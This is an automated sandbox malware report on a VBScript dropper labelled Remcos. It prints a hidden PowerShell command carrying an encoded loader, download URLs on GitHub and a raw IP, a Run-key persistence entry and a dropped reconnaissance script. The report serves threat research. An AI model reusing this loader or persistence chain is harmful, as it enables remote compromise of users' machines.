Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnujfsjysndxjsid0gjysnuuxljysnahr0cccrj3m6ly8nkydyyscrj3cnkycuz2l0accrj3unkydidxnlcmnvbnrlbnqnkycuy28nkydtl05vrgv0zwn0t24vtm9ezxqnkydljysnyycrj3rpbi9yjysnzwzzl2hlywrzlycrj20nkydhaw4vrgv0ywhob3rolscrj1yudhgnkyd0uuxloybsmwxiyxnlnjrdbycrj24nkyd0zw50id0gke5ldy1pymonkydly3qgu3lzdgunkydtlk5ljysndccrjy4nkydxzscrj2jdjysnbgknkydlbnqplkrvdycrj25sb2fkjysnu3ryaw4nkydnjysnkfinkycxbhvyjysnbck7jysnifixbgjpbicrj2fyescrj0mnkydvbnrlbnqnkycgjysnpsbbu3lzdccrj2vtlicrj0nvbnzlcnrdojpgcicrj29tqicrj2fzzty0u3ryjysnaw4nkydnkfixbgjhc2u2nccrj0nvbnqnkydlbicrj3qpjysnoybsjysnmwwnkydhc3mnkydlbwinkydsesa9iftszwynkydsjysnzwn0aw9ulkenkydzjysnc2unkydtymx5xto6tccrj29hzcgnkydsmwxiaw5hjysncnldb250jysnzw50ktsgjysnwycrj2rubglijysnlklpjysnlkgnkydvbwvdjysnojonkydwqukozhprdhh0licrj0dgq1jslzankyc1nc8zjysnns4znc4nkyc1ljinkyc3ly86chr0accrj2r6aycrjywgzhprjysnmwr6aycrjywgjysnzhprjysnqzprjysnc2gnkydqcm9ncicrj2ftrgf0ywtzagr6aywgzhpryxv0b3ankydhdglhzccrj3prlccrjybkemsnkydszwcnkydbc21keicrj2ssigqnkyd6a2qnkyd6aycrjyxkjysnemtkjysnemspjyktukvqtefdzsagkftjaefyxtewmctby2hbcl0xmjirw2noqxjdmta3ksxby2hbcl0zncatukvqtefdzsana3nojyxby2hbcl05mi1dukvwbefdzsagkftjaefyxtgyk1tjaefyxtq5k1tjaefyxtewocksw2noqxjdmzyglvjfuexbq2unuuxljyxby2hbcl0zosl8icyoichbc3rysu5nxsr2zxjct1nluhjlzkvsrw5jzslbmswzxssnecctak9jbicnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (one technique per tactic column; leading digits are the per-technique counters shown in the report, reproduced as given):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 331 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 331 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 11 Registry Run Keys / Startup Folder | 11 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph (rendered as an image in the original report; its text content follows)
Behavior Graph ID: 1523826 | Sample: WW8kzvnphl.vbs | Start date: 02/10/2024 | Architecture: WINDOWS | Score: 100
Sample level: contacts raw.githubusercontent.com; signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
wscript.exe (three instances started); signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
wscript.exe -> powershell.exe; signatures: Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
powershell.exe -> powershell.exe and conhost.exe
second powershell.exe: network 72.5.43.53 (ports 49731, 49738, 80; UNASSIGNED; United States) and raw.githubusercontent.com 185.199.111.133 (ports 443, 49730; FASTLYUS; Netherlands); signature: Creates autostart registry keys with suspicious values (likely registry only malware)
second powershell.exe -> cmd.exe; dropped file: C:\ProgramData\autopatia.vbs (ASCII); signature: Command shell drops VBS files
cmd.exe -> conhost.exe

Source | Detection | Scanner | Label
WW8kzvnphl.vbs | 13% | ReversingLabs | Script-WScript.Backdoor.Remcos
WW8kzvnphl.vbs | 7% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
raw.githubusercontent.com | 0% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://raw.githubusercontent.com | 0% | Virustotal |
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | 6% | Virustotal |
http://raw.githubusercontent.com | 0% | Virustotal |
http://72.5.43.53/450/RRCFG.txt | 0% | Virustotal |
http://72.5.43.53 | 0% | Virustotal |
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe; | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
raw.githubusercontent.com | 185.199.111.133 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
http://72.5.43.53/450/RRCFG.txt | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://72.5.43.53 | powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com | powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000003.00000002.2171869287.0000022A844FC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000003.00000002.2171869287.0000022A84BCE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000001.00000002.2215386722.0000021D94D87000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2215386722.0000021D94D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://72.5.43.53( | powershell.exe, 00000003.00000002.2171869287.0000022A83A08000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2215386722.0000021D94DCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe; | powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
72.5.43.53 | unknown | United States | 16769 | UNASSIGNED | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523826
Start date and time: 2024-10-02 05:25:53 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WW8kzvnphl.vbs (renamed because the original name is a hash value)
Original Sample Name: 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Detection: MAL
Classification: mal100.expl.evad.winVBS@11/7@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7464 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:26:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs
04:27:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs
23:26:47 | API Interceptor | 1024x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
72.5.43.53 | PO554830092024.xls | malicious | Unknown | 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
72.5.43.53 | PO554830092024.xls | malicious | Unknown | 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
72.5.43.53 | PO554830092024.xls | malicious | Unknown | 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
185.199.111.133 | 2THp7fwNQD.vbs | malicious | Unknown |
185.199.111.133 | R183nzNa89.exe | malicious | Unknown |
185.199.111.133 | Shipping Documents.xls | malicious | Remcos |
185.199.111.133 | Scan Order and Specification 01-10- 2024.docx | malicious | Remcos |
185.199.111.133 | DRAFT_PO.vbs | malicious | Unknown |
185.199.111.133 | file.exe | malicious | XWorm, Xmrig |
185.199.111.133 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat |
185.199.111.133 | https://rajkamalkanna.github.io/Facebook-Login-Page/ | malicious | HTMLPhisher |
185.199.111.133 | https://vinitk1509.github.io/NETFLIX | malicious | HTMLPhisher |
185.199.111.133 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | 2THp7fwNQD.vbs | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | iJEK0xwucj.vbs | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | 185.199.108.133
raw.githubusercontent.com | 00#U2800.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | asegurar.vbs | malicious | Remcos | 185.199.110.133
raw.githubusercontent.com | dcsegura.vbs | malicious | AsyncRAT, DcRat | 185.199.110.133
raw.githubusercontent.com | asegura.vbs | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | R183nzNa89.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | hHNfR2jxEo.exe | malicious | PureLog Stealer, XWorm | 185.199.109.133
raw.githubusercontent.com | tCNVKM4mkt.exe | malicious | PureLog Stealer, XWorm | 185.199.108.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | 2THp7fwNQD.vbs | malicious | Unknown | 185.199.111.133
FASTLYUS | iJEK0xwucj.vbs | malicious | Unknown | 185.199.108.133
FASTLYUS | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | 185.199.108.133
FASTLYUS | https://unpaidrefund.top/view/mygov | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | https://sanbernardinoscounty.telcom-info.com/ | malicious | HtmlDropper | 151.101.2.137
FASTLYUS | http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630 | malicious | Unknown | 151.101.194.137
FASTLYUS | http://detection.fyi | malicious | NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig | 185.199.110.154
FASTLYUS | 00#U2800.exe | malicious | Unknown | 185.199.110.133
FASTLYUS | https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg | malicious | HTMLPhisher | 151.101.66.137
FASTLYUS | https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no | malicious | HTMLPhisher | 151.101.194.137
UNASSIGNED | PO554830092024.xls | malicious | Unknown | 72.5.43.53
UNASSIGNED | PO554830092024.xls | malicious | Unknown | 72.5.43.53
UNASSIGNED | PO554830092024.xls | malicious | Unknown | 72.5.43.53
UNASSIGNED | SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elf | malicious | Mirai | 205.231.188.78
UNASSIGNED | Callus+1(814)-310-9943.pdf | malicious | PayPal Phisher | 199.67.80.79
                          7fhY3EJltt.lnkGet hashmaliciousUnknownBrowse
                          • 72.5.43.19
                          SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
                          • 156.134.188.67
                          staff recordpdf2024.exeGet hashmaliciousAgentTeslaBrowse
                          • 131.226.2.60
                          SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                          • 147.136.59.34
                          ORDER DATASHEET.batGet hashmaliciousRemcos, GuLoaderBrowse
                          • 131.226.2.26
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0e89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                          • 185.199.111.133
                          qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                          • 185.199.111.133
                          2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                          • 185.199.111.133
                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                          • 185.199.111.133
                          PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 185.199.111.133
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 185.199.111.133
                          mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 185.199.111.133
                          DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.111.133
                          No context
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):437480
                          Entropy (8bit):5.105403560005336
                          Encrypted:false
                          SSDEEP:6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
                          MD5:42320E659E8E1885EB96342E52E4EC60
                          SHA1:8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
                          SHA-256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
                          SHA-512:CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
                          Malicious:true
                          Reputation:moderate, very likely benign file
Preview (the report renders each CR/LF as "..", shown here as line breaks; the preview is truncated):
    Dim FSO, shell, xslProcessor

    Sub RunCmd(CommandString, OutputFile)
        cmd = "cmd /c " + CommandString + " >> " + OutputFile
        shell.Run cmd, 0, True
    End Sub

    Sub GetOSInfo(outputFileName)
        On Error Resume Next
        strComputer = "."
        HKEY_LOCAL_MACHINE = &H80000002

        Dim objReg, outputFile
        Dim buildDetailNames, buildDetailRegValNames

        buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type")
        buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType")

        Set outputFile = FSO.OpenTextFile(outputFileName, 2, True)

        Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
            strComputer & "\root\default:StdRegProv")

        outputFile.WriteLine("[Architecture/Processor Information]")
        outputFile.WriteLine()
        outputFile.Close
        cmd = "cmd /c set processor >> " & outputFileName
        shell.Run cmd, 0, True

        Set outputFile = FSO.OpenTextFile(outpu
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9434
                          Entropy (8bit):4.928515784730612
                          Encrypted:false
                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                          MD5:D3594118838EF8580975DDA877E44DEB
                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                          Malicious:false
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulF7///h:NllU
                          MD5:34C16D1FA50B565A72B382C978CB2D56
                          SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                          SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                          SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Entropy (8bit):3.744635927192172
                          TrID:
                          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                          • MP3 audio (1001/1) 32.22%
                          • Lumena CEL bitmap (63/63) 2.03%
                          • Corel Photo Paint (41/41) 1.32%
                          File name:WW8kzvnphl.vbs
                          File size:248'204 bytes
                          MD5:adadc5d47f87dd519f9a7da9ba03daf5
                          SHA1:3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
                          SHA256:2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
                          SHA512:93296d34e418a2885e2b9beb0c58078bb0d2f9ae7f27d39c6b404158e37d936efdd1ba10277ffbe5dc23a1bc26e0eb9d92e90a082ab7d44c4ffb39ff5d5ee1a0
                          SSDEEP:3072:KstfnxfYcd4gQu4Nl2YPfeesDvb7Ngt5pZGwRDaapS7emX8ANolXiZ+k+ugv/6xy:xfniUNYlMe6sAyY+uY6M/es
                          TLSH:0234080226EA7008F1F32F5796F955F94F67B9652A39821D648C1B0E1BE3E80CD51BB3
File Content Preview (UTF-16LE with BOM, decoded; the preview is truncated):
    LKNCBAcCthciiWZRWWPhJoLP = "OWGiuvkWxioACGLBsZkolkIL"
    quLGpeLPdcGALceLLGisWWtc = "oePLeWxWKkzWHNmCGbfcpUdb"
    eWtcZLpCALUmfLIdC
                          Icon Hash:68d69b8f86ab9a86
